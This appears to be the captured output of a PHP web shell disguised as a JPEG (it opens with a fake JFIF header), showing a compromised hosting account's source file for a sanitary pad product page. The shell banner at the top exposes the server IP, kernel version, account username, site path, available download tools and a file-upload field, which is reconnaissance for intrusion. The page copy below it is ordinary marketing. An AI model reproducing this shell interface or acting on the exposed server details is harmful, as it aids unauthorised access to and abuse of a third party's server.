���� JFIF fdasasfas213sdaf
Server IP : 147.79.69.163 / Your IP : 216.73.216.200 Web Server : LiteSpeed System : Linux in-mum-web669.main-hosting.eu 5.14.0-503.23.2.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Feb 12 05:52:18 EST 2025 x86_64 User : u479334040 ( 479334040) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u479334040/domains/softstart.in/public_html/ |
Upload File : |
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Senatry Pad - SS ENTERPRISES</title> <?php include 'assets.php'; ?> </head> <body> <?php include 'header.php'; ?> <main> <!-- |=====|| Page Title Start ||===============| --> <section class="page_title page_title__img-01"> <div class="page_title__padding"> <div class="container"> <div class="row"> <div class="col-lg-12"> <div class="page_title__content"> <h1 class="text-white">Senatry Pad</h1> <div class="page_title__bread-crumb"> <ul> <li><a href="index.php" class="textgrey">Home</a></li> <li><a href="javascript:void(0);">Senatry Pad</a></li> </ul> </div> </div> </div> </div> </div> </div> </section> <!-- |=====|| Working Process Start ||===============| --> <section class="working_process1"> <div class="working_process1__thumb1"> <img class="img_100" src="assets/img/png-img/png-img-04.png" alt="Image"> </div> <div class="working_process1__thumb2"> <img class="img_100" src="assets/img/png-img/png-img-05.png" alt="Image"> </div> <div class="content_box_100"> <div class="container"> <div class="row"> <div class="col-lg-8 offset-lg-2"> <div class="title2 mb-60 text-center"> <h4 class="mb-0">Our Products</h4> <h2>Our Premium Sanitary Pads</h2> <p> With advanced technology and careful attention to detail, our pads offer leak-proof protection and stay securely in place, allowing you to move freely and confidently. </p> </div> </div> </div> <div class="row"> <div class="col-xl-3 col-lg-4 col-sm-6"> <div class="working_process1__item text-center mb-30"> <a href="cottony-soft-cover.php"> <div class="working_process1__thumb mb-30"> <img src="img/products/1.jpg" alt="Service"> </div> <div class="working_process1__content"> <h3>Cottony Soft Cover</h3> <p class="m-0"> providing a gentle, breathable layer that keeps your baby’s skin dry and irritation-free. </p> </div> </a> </div> </div> <div class="col-xl-3 col-lg-4 col-sm-6"> <a href="dry-comfort.php"> <div class="working_process1__item text-center mb-30"> <div class="working_process1__thumb mb-30"> <img src="img/products/2.jpg" alt="Service"> </div> <div class="working_process1__content"> <h3>Dry Comfort</h3> <p class="m-0"> ensuring your baby stays dry and comfortable all day long. </p> </div> </div> </a> </div> <div class="col-xl-3 col-lg-4 col-sm-6"> <a href="long-lasting-comfort.php"> <div class="working_process1__item text-center mb-30"> <div class="working_process1__thumb mb-30"> <img src="img/products/3.jpg" alt="Service"> </div> <div class="working_process1__content"> <h3>Long Lasting Comfort</h3> <p class="m-0"> keeping your baby cozy, dry, and comfortable for hours, no matter how active they are. </p> </div> </div> </a> </div> <div class="col-xl-3 col-lg-4 col-sm-6"> <a href="xl-ultra-thin.php"> <div class="working_process1__item text-center mb-30"> <div class="working_process1__thumb mb-30"> <img src="img/products/4.jpg" alt="Service"> </div> <div class="working_process1__content"> <h3>XL Ultra-Thin</h3> <p class="m-0"> offering maximum absorbency in a slim, lightweight design for all-day comfort and protection. </p> </div> </div> </a> </div> </div> </div> </div> </section> </main> <?php include 'footer.php'; ?> </body> </html>